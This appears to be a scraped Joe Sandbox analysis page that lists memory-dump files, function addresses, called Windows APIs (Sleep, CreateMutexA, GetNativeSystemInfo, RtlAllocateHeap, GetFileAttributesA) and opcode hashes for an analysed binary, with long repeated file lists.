Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5ff7de90f2c74d1f2a853a1d498a0f756c424ae0f3b23e636a3768261ff08c7f
Instruction ID: 36c7c7e4ab08dda4f9e09836aec036e2a02815b1a98093e047ef48ccba5ebba6
Opcode Fuzzy Hash: 5ff7de90f2c74d1f2a853a1d498a0f756c424ae0f3b23e636a3768261ff08c7f
Instruction Fuzzy Hash: C8213A316042109BEB18AB68FD8976DF7E2EBC1710F204299E51C8B3D5DB7699808711

Function 00B2A856 Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5f6a6a22b495737bf4e66f12f92fbea0e2b37c29dce705201c720f5af55b11d1
Instruction ID: bf695ba16da53ae6d467ec7340438d8fa2319cfad6ab8a2fdd5954a9b08a22f5
Opcode Fuzzy Hash: 5f6a6a22b495737bf4e66f12f92fbea0e2b37c29dce705201c720f5af55b11d1
Instruction Fuzzy Hash: 6C217F716852219BFB246769B99A73DB3D2DF81700F2004D6F10CDB3D1CF7658818653

Function 00B2A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00B2A963
CreateMutexA.KERNEL32(00000000,00000000,00B83254), ref: 00B2A981

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 2ad88f6fc9593493e741e95131944bb6c54a7ed44a520beda6bfadd599c7689d
Instruction ID: e7434864c67ab0421fbe0bec70efc1ebaabc0f17212be55c6a666458e4ce5e60
Opcode Fuzzy Hash: 2ad88f6fc9593493e741e95131944bb6c54a7ed44a520beda6bfadd599c7689d
Instruction Fuzzy Hash: C12179316002109BEB18EB28FD8576CF7E2EBC1710F20429AE51C9B3D5CB76A5C08352

Function 00B27D30 Relevance: 1.9, APIs: 1, Instructions: 426
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00B27ED3

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 72bbcef252fdc8ac92ef642af371f700f4a01d84b37b9548d62ca657504f4630
Instruction ID: 482e7b7e76c4449656136d2d7f32529103e5ad49a6017fa6a1cb8049fb48f7ef
Opcode Fuzzy Hash: 72bbcef252fdc8ac92ef642af371f700f4a01d84b37b9548d62ca657504f4630
Instruction Fuzzy Hash: E0E1F470E002649BDB24BB28ED477AD7BE1EB45720F9442D8E4196B3D2DF354E808BC6

Function 00B5D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00B5A813,00000001,00000364,00000006,000000FF,?,00B5EE3F,?,00000004,00000000,?,?), ref: 00B5D871

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264250857.0000000000D7B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264297700.0000000000D80000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264363361.0000000000D81000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264454747.0000000000D84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264485622.0000000000D94000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264514027.0000000000D97000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264579436.0000000000D9F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264617171.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264666917.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264698485.0000000000DA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264722936.0000000000DA6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264767282.0000000000DAA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264800781.0000000000DAC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264830770.0000000000DAD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264893177.0000000000DB4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264925357.0000000000DB6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264973602.0000000000DBD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265002785.0000000000DBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265074796.0000000000DD1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DD4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265152560.0000000000DF9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265238833.0000000000E2A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265272134.0000000000E2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265294072.0000000000E2C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265322265.0000000000E30000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265346138.0000000000E32000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265370247.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265391318.0000000000E43000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b20000_file.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 910de8f36c10e661f5eea59a9d638ce35addca7625cc489393c1f7101c4e3445
Instruction ID: 87addc97507835b76f07af8f5bd13f3b8a0a5145bf0425c9da8ff06c86d8499e
Opcode Fuzzy Hash: 910de8f36c10e661f5eea59a9d638ce35addca7625cc489393c1f7101c4e3445
Instruction Fuzzy Hash: A9F0E232601624A6EB312A72AC01B5B37D9DF95373B1882E1EC08E7181EE60EC0D86E0

Function 00B287B2 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,00B2DA1D,?,?,?,?), ref: 00B287B9

Memory Dump Source

Source File: 00000000.00000002.2263048364.0000000000B21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000000.00000002.2263009079.0000000000B20000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263048364.0000000000B82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263197124.0000000000B89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263230633.0000000000B8B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263259717.0000000000B97000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263408061.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263431405.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D14000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263469671.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263534135.0000000000D25000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263567117.0000000000D27000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263592585.0000000000D28000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263621554.0000000000D2B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263658433.0000000000D3D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263686082.0000000000D3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263720268.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2263754240.0000000000D64000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264152445.0000000000D77000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2264185231.0000000000D7A000.00000040.00000001.01000000.00000003.sdmpDownload File
